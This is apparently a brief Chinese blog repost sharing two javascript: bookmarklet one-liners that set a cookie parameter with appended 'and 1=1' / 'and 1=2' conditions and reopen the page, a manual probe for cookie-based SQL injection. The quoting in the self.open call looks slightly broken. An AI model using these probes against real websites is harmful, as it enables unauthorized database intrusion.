鬼仔 <guizaicn@gmail.com> 发表于昨天21:56 来自:鬼仔's Blog 作者:lcx
来源:vbs小铺 javascript:alert(document.cookie="参数= "+escape("参数值 and 1=1"));self.open("http://+"document.location.host+document.location.pathname);void(0); javascript:alert(document.cookie="参数="+escape("参数值 and 1=2"));self.open("http://+"document.location.host+document.location.pathname);void(0); 哎,还是在新窗口打开了,不过比网上流传的省了一步刷新和返回了。 |
|